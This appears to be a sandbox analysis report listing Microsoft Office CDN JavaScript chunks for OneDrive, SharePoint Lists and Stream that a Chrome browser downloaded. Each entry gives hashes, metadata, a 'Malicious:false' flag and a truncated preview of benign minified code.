                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1,837],{3030:function(e,t,n){n.r(t),n.d(t,{getSessionToken:function(){return l}});var a=n("tslib_102"),i=n(1343),r=n(67),o=n(272),s=n(14),c=n("odsp.util_578"),d=n(1298);function l(e){var t=this;return function(n){return(0,a.Zd)(t,void 0,void 0,function(){var t,l,f,p,m,_,h,b,g,v,y,S,D,I,x,C,O,w=this;return(0,a.qr)(this,function(E){switch(E.label){case 0:if(t=e.scopes,l=void 0===t?["Files.ReadWrite.All"]:t,f=e.endpoint,p=e.driveUrl,m=e.qosExtraData,_=n((0,r.a)({graphDataSourceConfiguration:i.a,graphTokenProviderConfiguration:d.a})),h=_.graphDataSourceConfiguration,b=_.graphTokenProviderConfiguration,g=h&&h.ensureAuthToken,v=p&&h&&h.ensureAuthTokenWithAction,y=b&&b.getSessionToken,D=y?function(){return(0,a.Zd)(w,void 0,void 0,function(){return(0,a.qr)(this,function(e){switch(e.label){case 0:return[4,y({endpoint:f,driveUrl:p,path:p||f})];case 1:return[2,e.sent()]}})})}:v?function(){return(0,a.Zd)(w,void 0,void 0,
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text
                              Category:downloaded
                              Size (bytes):161
                              Entropy (8bit):5.203904944423562
                              Encrypted:false
                              SSDEEP:
                              MD5:C3B3FA483B8C10C2E156F2D1BCEC7C47
                              SHA1:49209B56FBAA94EBF7B51B7C088B0E57426D3483
                              SHA-256:56C85DD672F8B03406F58AF007B7F49FC323AA07A9988C6E9CC9319AA0E9A970
                              SHA-512:E97A4D59164C561C5414C1DC6D9439CD52D30295DBE3C503A4BCC8B776B39FE2345E43AD6F335299258A72416BF682D1E11D8C564F50339FE182C6A863D6A47B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1427.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1427],{4063:function(e,t,n){n.r(t),(0,n("fui.util_150").pZ)(JSON.parse("[]"))}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (13295)
                              Category:downloaded
                              Size (bytes):619292
                              Entropy (8bit):5.087806621423965
                              Encrypted:false
                              SSDEEP:
                              MD5:767C686344C3AA448FA9AC4A091BFE49
                              SHA1:5671440401B5E33E97ED0994EA6B446D1F9CE46D
                              SHA-256:7B15159AF53BE80BB17FE033C7D45591EA1CC49E69B69274BA06FA50FBDA4F45
                              SHA-512:392B4896FD821DB39C8FDF99B23BD48E2AA05FA5FE81B023409013D7126DCBD69F8C5EF31A2D1A384B8E2DC2680C34B9A0FD13A90004FF881F3DAAEAD01A208C
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/de/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5336)
                              Category:downloaded
                              Size (bytes):11748
                              Entropy (8bit):5.367458622514348
                              Encrypted:false
                              SSDEEP:
                              MD5:E5F8972B3B0F0DABDA9D34D7D88C0670
                              SHA1:747DEBD67882F81750E5F168753732C18C20AA61
                              SHA-256:4095FDAAA4900D256D89CA82249F6378EA679F4491E1ED3B2278EC0F18FC18E2
                              SHA-512:1B66CE3F3D12C8EFBD7D73875274A75D88A8B80B6D4D156C53EB0214CAC8C25C3C136CDDC6097E95B4D2929F2A17D2985AF2DD36129166C17E43615EE1307D50
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/1039.js
                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1039,1042,708],{2180:function(e,t,n){var a;!function(i,r){"use strict";var o=function(e){if("object"!=typeof e.document)throw new Error("Cookies.js requires a `window` with a `document` object");var t=function(e,n,a){return 1===arguments.length?t.get(e):t.set(e,n,a)};return t._document=e.document,t._cacheKeyPrefix="cookey.",t._maxExpireDate=new Date("Fri, 31 Dec 9999 23:59:59 UTC"),t.defaults={path:"/",secure:!1},t.get=function(e){return t._cachedDocumentCookie!==t._document.cookie&&t._renewCache(),t._cache[t._cacheKeyPrefix+e]},t.set=function(e,n,a){return(a=t._getExtendedOptions(a)).expires=t._getExpiresDate(n===r?-1:a.expires),t._document.cookie=t._generateCookieString(e,n,a),t},t.expire=function(e,n){return t.set(e,r,n)},t._getExtendedOptions=function(e){return{path:e&&e.path||t.defaults.path,domain:e&&e.domain||t.defaults.domain,expires:e&&e.expires||t.defaults.expires,secure:e&&e.secure!==r?e.secure:t.defaults.secur
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (23961)
                              Category:downloaded
                              Size (bytes):76548
                              Entropy (8bit):5.41909926359367
                              Encrypted:false
                              SSDEEP:
                              MD5:893EE39E3C0AF68C0D43B4A22295765C
                              SHA1:297FBEBFED639C7B559EA86CFC290E4E6051AD70
                              SHA-256:6319665C42F64F9B82D1130FDC7E0908A020C0F7376ABBA86E4A3CBAC1A5A6C6
                              SHA-512:2B74B5B941A48B6F3036DE08BB01FDDEA6A8A5BDF95DA894EC166053FEF0FBC205B37C6E9B76F1C24DDD15CF5863ED65FB90560D14E3F6369C4612D5B209EDB1
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/32.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[32,550],{185:(e,t,n)=>{n.d(t,{a:()=>o});var a=n("react-lib"),i=n(5625),r=n(5408);function o(e){var t=a.useRef(function(){throw new Error("Cannot call an event handler while rendering")});return(0,r.a)(function(){t.current=e},[e]),(0,i.a)(function(){return function(){for(var e=[],n=0;n<arguments.length;n++)e[n]=arguments[n];var a=t.current;return a.apply(void 0,e)}})}}.,186:(e,t,n)=>{n.d(t,{a:()=>i});var a=n("react-lib"),i=function(e){var t=a.useRef(e);t.current=e,a.useEffect(function(){return function(){var e;null===(e=t.current)||void 0===e||e.call(t)}},[])}}.,203:(e,t,n)=>{n.d(t,{a:()=>c});var a=n("react-lib"),i=n(5464),r=n("fui.core_238");const o=(0,r.Xx5)({root:{mc9l5x:"f1w7gpdv",Bg96gwp:"fez10in",ycbfsm:"fg4l7m0"},rtl:{Bz10aip:"f13rod7r"}},{d:[".f1w7gpdv{display:inline;}",".fez10in{line-height:0;}",".f13rod7r{-webkit-transform:scaleX(-1);-moz-transform:scaleX(-1);-ms-transform:scaleX(-1);transform:scaleX
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (416)
                              Category:downloaded
                              Size (bytes):421
                              Entropy (8bit):5.212092719158123
                              Encrypted:false
                              SSDEEP:
                              MD5:170587AA7BAB463651B404D919D1B835
                              SHA1:538859F0F0EBF0D9164BCC18FD87269C2D3EA291
                              SHA-256:4242BC0C2AF6E17CBF53CA4189DAF242F4D8077F95E79B45F3946D2CE389FEFA
                              SHA-512:78C62F406BFE0478D4D15235F44DADFC31E013D3775655D84F8616B1E066A9CE978F2942061D633CECEB6F40DFB7E918175A926FAEAEF6A8F61725C785402A26
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/234.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[234],{2036:(e,t,n)=>{n.r(t),n.d(t,{SetListRatingExperienceToastsAsyncKey:()=>i});var a=n("odsp.util_578"),i=new a.qT({name:"SetListRatingExperienceToasts.async.key",loader:new a.g6(function(){return Promise.all([n.e("ondemand.resx"),n.e(232)]).then(n.bind(n,2049)).then(function(e){return e.setListRatingExperienceToastsResourceKey})})})}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (5725)
                              Category:downloaded
                              Size (bytes):5730
                              Entropy (8bit):5.120883894001602
                              Encrypted:false
                              SSDEEP:
                              MD5:C1B6F61718EEF81143BCCC833CFC3031
                              SHA1:FCD04C2B992C36330F7156C1B01B2678C916CD64
                              SHA-256:9DA99A8C31B1A5804FC6DD3C006A76636FFAF747877F32C78BFE780A9F29B9B0
                              SHA-512:A44E461A79733A75E90511693B2FE6ECC648E1CCA6CB8F7A831D8767E38B58F934A45C648812E75B93C1DA871F019D694742603062CD6B84CAE835559CAC6D1B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/15.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[15],{413:(e,t,n)=>{n.r(t),n.d(t,{commandDisplaySetOverrideFuncsKey:()=>D});var a,i,r=n("odsp.util_578"),o=n("tslib_102"),s=n(150);!function(e){e.NoSelection="NoSelection",e.SingleSelection="SingleSelection",e.MultiSelection="MultiSelection"}(a||(a={})),function(e){e.Primary="Primary",e.Overflow="Overflow"}(i||(i={}));var c=n(519),d=n(107),l=n(89),u=n(134),f=["managePermissions","clearSelection","reportConcern","requestReview","ComplianceDetails"];function p(e,t,n){return!(f.indexOf(e.id)>=0||n&&-1===n.indexOf(t))}function m(e){var t=e.currentSelectionMode,n=e.customization,a=e.commandBarItem;if(!n||!p(a,t,n.selectionModes))return a;var i=n.text,r=n.title,s=n.iconName;return(0,o.W_)((0,o.W_)({},a),{name:i||a.name,title:r||a.title,iconProps:s?{iconName:s}:a.iconProps})}function _(e){var t=e.commands,n=e.customizationMapValue,a=e.currentSelectionMode,i=function(e,t,n){var a={};return t.forEach(function(t){var i=
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (8564)
                              Category:downloaded
                              Size (bytes):711907
                              Entropy (8bit):5.376125628345595
                              Encrypted:false
                              SSDEEP:
                              MD5:77A23FDC9079617AC540DB121D259B07
                              SHA1:02E3FFE2B57D5B4BAE850B5B0CA6C1DC88430E07
                              SHA-256:C359F7C34E060734E9B55DC120B47AEB719FC2405C97C04EE80FF64FD893D35C
                              SHA-512:F64BAA3CA3CA99F3BF43D383B8B4B8FA9F95F188714F75E1BD5ACA2E758BA124D0B116EF75F55330F0D45A645D1784FE255DCEEE8AA4CDA27906F1E28C2DF85B
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/17.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[17,81,36,216],{814:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(1411);t.isDocumentFragment=a.default;var i=n(1412);t.isHTMLElement=i.default;var r=n(1413);t.isHTMLOListElement=r.default;var o=n(1414);t.isHTMLTableCellElement=o.default;var s=n(1415);t.isHTMLTableElement=s.default;var c=n(1416);t.isNode=c.default;var d=n(1417);t.isRange=d.default;var l=n(887);t.safeInstanceOf=l.default}.,1411:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"DocumentFragment")}}.,1412:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"HTMLElement")}}.,1413:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=function(e){return a.default(e,"HTMLOListElement")}}.,1414:(e,t,n)=>{Object.defineProperty(t,"__esModule",{value:!0});var a=n(887);t.default=functi
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3519)
                              Category:downloaded
                              Size (bytes):7375
                              Entropy (8bit):5.114994926718038
                              Encrypted:false
                              SSDEEP:
                              MD5:C76F1D511B2B83C45200C6E6F0C3E549
                              SHA1:C0DC30D6EE93F1099BFDF27AAAE80EAB34D9837F
                              SHA-256:143E1F89D43B2E252D1746C1B204B5190E710FC9D92EE28AB1034146E8250220
                              SHA-512:70A30E6D2D68579FAA3C12F03ABB6D5A00D7CC35C59F2FADADC17BE8753078CB410D4782D3B8CB1CFCFF24B684061BC177E4272AB6E92F3C60B8632FF79FF770
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/1.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[1],{390:(e,t,n)=>{n.d(t,{a:()=>o});var a,i=n(391),r=n("odsp.util_578");const o=function(){function e(){}return e.hasClass=function(e,t){return e.classList?e.classList.contains(t):-1!==(e.className?e.className.split(" "):[]).indexOf(t)},e.toggleClass=function(e,t,n){if(e.classList)n?e.classList.add(t):e.classList.remove(t);else{var a=e.className?e.className.split(" "):[],i=a.indexOf(t);n?-1===i&&a.push(t):i>-1&&a.splice(i,1),e.className=a.join(" ")}},e.loadStyles=function(t){e._platform.isUnlimitedStyleSheetsSupported?e.registerStyle(t):e.registerStyleIE(t)},e.registerStyle=function(e){var t=document.getElementsByTagName("head")[0],n=document.createElement("style");n.type="text/css",n.appendChild(document.createTextNode(e)),t.appendChild(n)},e.registerStyleIE=function(t){var n=document.getElementsByTagName("head")[0],a=e._lastStyleElement?e._lastStyleElement.styleSheet.cssText:"";(!e._lastStyleElement||a.lengt
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (48909)
                              Category:downloaded
                              Size (bytes):65096
                              Entropy (8bit):5.310089079014796
                              Encrypted:false
                              SSDEEP:
                              MD5:FDC9E597278A81FDC0714BFF9FBDB0ED
                              SHA1:6A1DC88783554C6E5019ABB4CFA899B20540290A
                              SHA-256:AD31AAB327C5619E2D29B827FC808FA0BE7AD80F936CFCB4D1F7D49D00E16545
                              SHA-512:2FB386B0EA314BF8D87B21D7EA39CF11728B5A1322789A3890D4747EB3C924E0A6C95C6027523CE409298E8C66CA30B9A83BAFDB071F598214BE47049CF3D5BB
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/67.js
                              Preview:(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[67],{1805:e=>{self,e.exports=function(){"use strict";var e,t,n,a={682:function(e,t,n){n.d(t,{Jh:function(){return r},XA:function(){return o},mG:function(){return i},pi:function(){return a}});var a=function(){return a=Object.assign||function(e){for(var t,n=1,a=arguments.length;n<a;n++)for(var i in t=arguments[n])Object.prototype.hasOwnProperty.call(t,i)&&(e[i]=t[i]);return e},a.apply(this,arguments)};function i(e,t,n,a){return new(n||(n=Promise))(function(i,r){function o(e){try{c(a.next(e))}catch(e){r(e)}}function s(e){try{c(a.throw(e))}catch(e){r(e)}}function c(e){var t;e.done?i(e.value):(t=e.value,t instanceof n?t:new n(function(e){e(t)})).then(o,s)}c((a=a.apply(e,t||[])).next())})}function r(e,t){var n,a,i,r,o={label:0,sent:function(){if(1&i[0])throw i[1];return i[1]},trys:[],ops:[]};return r={next:s(0),throw:s(1),return:s(2)},"function"==typeof Symbol&&(r[Symbol.iterator]=function(){return this}),r;function s(r){return
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (45377)
                              Category:downloaded
                              Size (bytes):46813
                              Entropy (8bit):6.171432163168747
                              Encrypted:false
                              SSDEEP:
                              MD5:5085AF7226AB395EC721127EC3FD9AF9
                              SHA1:A7BDF708148661B192A138CBDC5DB5F8AC7227DA
                              SHA-256:B45AE8B46563399DCCBB5813329AC97BC54D9B393E2A81D2156F4D61E511BC0F
                              SHA-512:D17918FB5CDBD37F278DB1B1676AF2CD463213279940413E26CDA0CA4720A9EA57A06617FA1B6E959D56605B7626A7C840BAB0B6345068D5916087918ACDE89F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/34876.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[34876],{444829:(e,t,n)=>{n.d(t,{S:()=>c});var a=n(295610),i=n(408156),r=n.n(i),o=n(538054),s=n(800596),c=function(e){function t(){var t=null!==e&&e.apply(this,arguments)||this;return t.state={},t}return(0,a.__extends)(t,e),t.prototype.render=function(){return void 0!==this.state.failure&&void 0!==this.props.fallback?this.props.fallback(this.state.failure):this.props.children},t.prototype.componentDidCatch=function(e,t,n){void 0===n&&(n=!0);var a=(0,o.E0)(e);try{this.props.onCatch&&this.props.onCatch({error:a,info:t})}catch(e){n&&this.componentDidCatch(new s.d(a,(0,o.E0)(e)),t,!1)}finally{n&&void 0===this.state.failure&&this.setState({failure:{error:a,info:t}})}},t}(r().Component)}.,800596:(e,t,n)=>{n.d(t,{d:()=>i});var a=n(295610),i=function(e){function t(n,a){var i=e.call(this,a.message)||this;return i.originalError=n,i.handlingError=a,i.stack=a.stack,void 0!==typeof Object.setPrototypeOf&&
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (18799)
                              Category:downloaded
                              Size (bytes):52845
                              Entropy (8bit):5.002451923761834
                              Encrypted:false
                              SSDEEP:
                              MD5:9B7448782F3D56D09C9EB608BCABFC0F
                              SHA1:DF60A7E02CDAC384D3418267119C21984163EB3F
                              SHA-256:7216924BA73187DAA6BE94CB5173892956EAB264B75051DAA51B4E3EF532FAD2
                              SHA-512:33DBFB0E7EF10EFC7DDD3E09465A74A36FA9189E671756C145FB67BA996BBA9F803132088B8575B8168535EC09344DAB550EAA6E014B949DFB4DE5E07C4B7BA2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-gb/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{586:e=>{e.exports=JSON.parse('{"a":"Something went wrong","c":"Try refreshing the page","b":"Something went wrong and we couldn\\u0027t get the page to display."}')}.,1612:e=>{e.exports=JSON.parse('{"a":"Open in Immersive Reader"}')}.,696:e=>{e.exports=JSON.parse('{"b":"Add shortcut to My files","d":"Add shortcut to OneDrive","n":"Remove","p":"Remove shortcut from My files","y":"Remove from shared list","a":"Add a shortcut to this folder in My files","o":"Remove the shortcut to this folder from My files","c":"Add a shortcut to this folder in OneDrive","m":"Remove the selected shortcut from this location","f":"Add shortcut to Albums","e":"Add a shortcut to this shared album in albums","k":"Open file location","t":"Date","s":"Any date","u":"Last 24 hours","w":"Last week","v":"Last month","x":"Last year","l":"Photos","r":"Type","g":"Any Type","i":"Folders","h":"Documents","j":"Music","q":"PC Syn
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (14939)
                              Category:downloaded
                              Size (bytes):82155
                              Entropy (8bit):5.752010849914365
                              Encrypted:false
                              SSDEEP:
                              MD5:7C548275ED0E425115B6F06D0F92E2B5
                              SHA1:B29D5391F5B6D5B3C3F27ECCB078E1259B6D26EB
                              SHA-256:1AC9D5BE667B2D9573FE866D3AE1A3B351414F96AC2A8BB112AE6C467A28C88C
                              SHA-512:55910BDE218DCD35025708F745E6EECC0A87496691011F7B2DDFC59AD5A3A9D72C7AA577AADCDC44FBDF23E505402EC07F4022B0EEE3473DF2D918D1BFDA0C5F
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-odb-teams/ja/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{788:e=>{e.exports=JSON.parse('{"a":".........","c":"..............","b":"............................."}')}.,1640:e=>{e.exports=JSON.parse('{"a":"..... ......."}')}.,277:e=>{e.exports=JSON.parse('{"b":"[.......] ............","d":"OneDrive ............","n":"..","p":".....................","y":".........","a":".. .........................","o":".. ..........................","c":"OneDrive ......................","m":".....................","f":"..
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (8456)
                              Category:downloaded
                              Size (bytes):20737
                              Entropy (8bit):5.5555920458663435
                              Encrypted:false
                              SSDEEP:
                              MD5:CFD1AF359A26398C29B29359DD2A3EFA
                              SHA1:C9791E944FDD2B42CD71C2922FD2E134349E97F2
                              SHA-256:6D0845F0EA97A0549FDA1A9F4CEA1E52802009580B341F3480221938955EDB4F
                              SHA-512:75402F1F01CBA9BB4E27DA26190F1D85FA9AB19D63C8D6CFF59F6DBE50B4C824E9CDE5A76AA5B3D51C5F24BB4219B326CF70B64D7966DA5422EA2BA7F389F495
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/30120.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[30120],{970563:(e,t,n)=>{n.d(t,{CNe:()=>v,Etx:()=>u,J6x:()=>o,NRb:()=>d,NSV:()=>f,Nzy:()=>g,Q5n:()=>h,QxX:()=>y,RW6:()=>l,W9n:()=>c,Wb0:()=>r,Y10:()=>p,Y9O:()=>i,co0:()=>m,kMn:()=>s,ogh:()=>b,qhq:()=>_});var a=n(109785);const i=(0,a.k)("ChevronDownRegular","1em",["M15.85 7.65c.2.2.2.5 0 .7l-5.46 5.49a.55.55 0 0 1-.78 0L4.15 8.35a.5.5 0 1 1 .7-.7L10 12.8l5.15-5.16c.2-.2.5-.2.7 0Z"]),r=(0,a.k)("ChevronLeftFilled","1em",["M12.27 15.8a.75.75 0 0 1-1.06-.03l-5-5.25a.75.75 0 0 1 0-1.04l5-5.25a.75.75 0 1 1 1.08 1.04L7.8 10l4.5 4.73c.29.3.28.78-.02 1.06Z"]),o=(0,a.k)("ChevronLeftRegular","1em",["M12.35 15.85a.5.5 0 0 1-.7 0L6.16 10.4a.55.55 0 0 1 0-.78l5.49-5.46a.5.5 0 1 1 .7.7L7.2 10l5.16 5.15c.2.2.2.5 0 .7Z"]),s=(0,a.k)("ChevronRightFilled","1em",["M7.73 4.2a.75.75 0 0 1 1.06.03l5 5.25c.28.3.28.75 0 1.04l-5 5.25a.75.75 0 1 1-1.08-1.04L12.2 10l-4.5-4.73a.75.75 0 0 1 .02-1.06Z"]),c=(0,a.k)("ChevronR
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (7235)
                              Category:downloaded
                              Size (bytes):7334
                              Entropy (8bit):5.138765267335293
                              Encrypted:false
                              SSDEEP:
                              MD5:AAF550F83548A472677CA0D8AF09EB40
                              SHA1:2FF0061EFBA8143D235565B37B07B85D457ED839
                              SHA-256:0B100BD5D5D6E6BB7F833AA6382A5C9809829805825FDAC7F0C8AE66F83E3276
                              SHA-512:0B7ED87E5700345A1FA5C6ACF8F51F9F1ABDF291C3E2BA8DEE540F226A68B73251087321B12787764E31296C1EF88133F4672083ED18A39E677105534B479AAF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/sp-client/odsp.tslib/tslib-b1569464.js
                              Preview:/*! For license information please see tslib-b1569464.js.LICENSE.txt */."use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["tslib"],{tslib_102:function(e,t,n){n.d(t,{W_:function(){return r},nT:function(){return S},Hq:function(){return y},qA:function(){return D},jr:function(){return v},Zd:function(){return l},nu:function(){return w},Cn:function(){return E},bg:function(){return f},uh:function(){return s},m_:function(){return p},XJ:function(){return i},qr:function(){return u},D:function(){return O},JV:function(){return C},hY:function(){return I},ZX:function(){return d},$T:function(){return c},MS:function(){return _},l7:function(){return o},AE:function(){return g},CO:function(){return b},Te:function(){return h},OY:function(){return m}});var a=function(e,t){return a=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])},a(e,t)};function i(e,t){if("fun
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1325)
                              Category:downloaded
                              Size (bytes):1330
                              Entropy (8bit):5.094079876948788
                              Encrypted:false
                              SSDEEP:
                              MD5:5C9EE9D69E4F72DD2C8C199C92DF4D88
                              SHA1:DA9BF39AABB516B57369E854A5512B05A5E71787
                              SHA-256:C69798F3378AE07633559E397EF68B2F848F61A59E3D00A955369501D2794657
                              SHA-512:7F7EE4AD02AF75241C83579E17D3433992F40900A1D00CDC238AAD1BDE043522C54F641DDF44D9AC2602FDB363DFA07A28362DDEAA6EA29625B84777A5FB3173
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/odblightspeedwebpack/629.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[629],{4900:function(e,t,n){n.r(t);var a=n("tslib_102"),i=n(2095),r=n(939),o=n(162),s=n(2100),c=n(69),d=n(129),l=n(2200),u=n(2554),f=function(e){function t(t){var n=e.call(this,t)||this;n.name="ViewInFolderAction";var a=n.resources;return n._actionMap=a.consume(o.a),n._itemSelectionHelper=new(n.child(s.a))({allowMultiSelect:!1,canFallback:!1}),n._navigationAction=new(n.managed(n._actionMap.NavigationAction))({url:n.createPureComputed(function(){return n._itemSelectionHelper.firstItem()&&n._itemSelectionHelper.firstItem().parentLink})}),(0,d.a)()&&(n._openInDesktopAction=new(n.managed(n._actionMap.OpenInDesktopAction))({openRelation:l.a.specified,item:n._itemSelectionHelper.firstItem,actionType:u.a.OpenFileLocation})),n}return(0,a.XJ)(t,e),t.prototype.onExecute=function(e,t){return this._openInDesktopAction?this._openInDesktopAction.execute(e):this._navigationAction.execute(e)},t.prototype.onIsAvailable=functio
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1090)
                              Category:downloaded
                              Size (bytes):1347
                              Entropy (8bit):5.310480867772195
                              Encrypted:false
                              SSDEEP:
                              MD5:C9CD1085119FECE50628857677C49616
                              SHA1:5EFA92AAEAB4C8F29025F077405557B002317A9E
                              SHA-256:494F847C0000F21654CC973EA3FD9A52856465247C2350624D06F6ACF371D745
                              SHA-512:7818C9F5CA43E5D847C857634BD497698B757C4FBD98AEB1AF50E62FAC75CD0423A36439F6C87854BCFBF36EA1530F8929591104AD3D42597B80623A3279D613
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/225.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[225],{1543:(e,t,n)=>{n.d(t,{a:()=>r,b:()=>a,c:()=>i,d:()=>o});var a=320,i={styles:{main:{minHeight:"auto"}}},r={showCloseButton:!0};function o(e){e&&(e.focus(),e.select())}}.,2030:(e,t,n)=>{n.r(t),n.d(t,{RenameViewDialog:()=>d});var a=n("tslib_102"),i=n("react-lib"),r=n(34),o=n(2100),s=n(1543);(0,n("fui.util_150").pZ)([{rawString:".label_7cc4bfb7{font-size:var(--ms-fonts-medium-fontSize);font-weight:var(--ms-fonts-medium-fontWeight);font-weight:600;margin-bottom:5px;display:block}"}]);var c="RenameViewDialog_ViewName";function d(e){var t=(0,i.useState)(e.currentViewName),n=t[0],d=t[1],l=r.a.Dialog,u=r.a.DialogFooter,f=r.a.PrimaryButton,p=r.a.DefaultButton,m=r.a.TextField,_=n===e.currentViewName,h=function(){e.onRenameCurrentView(n),e.onDismiss()},b={componentRef:s.d,onKeyPress:function(e){13===e.which&&(_||h())}},g=(0,a.W_)({title:o.h},s.a);return i.createElement(l,{hidden:!1,dialogContentProps:g,modalProps:s
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1715)
                              Category:downloaded
                              Size (bytes):3503
                              Entropy (8bit):5.184231238795192
                              Encrypted:false
                              SSDEEP:
                              MD5:66FC8BB6D775632BA42DF145E48DD55A
                              SHA1:23A6A2F1194B9857082C7A2700A60CF09C51996F
                              SHA-256:27239F40CA0A4B1411B48ED0B518772FEF83912B1CF9805BEEF7A3D53323A119
                              SHA-512:1ABE4B1E36A005F9BAC0CC2B436817E28ED957663246574CF637049D21CD2E55B000912731E9BCCC6F62527D08CF16ADFE91FFDBFB75E87B82EBA0952A08B631
                              Malicious:false
                              Reputation:unknown
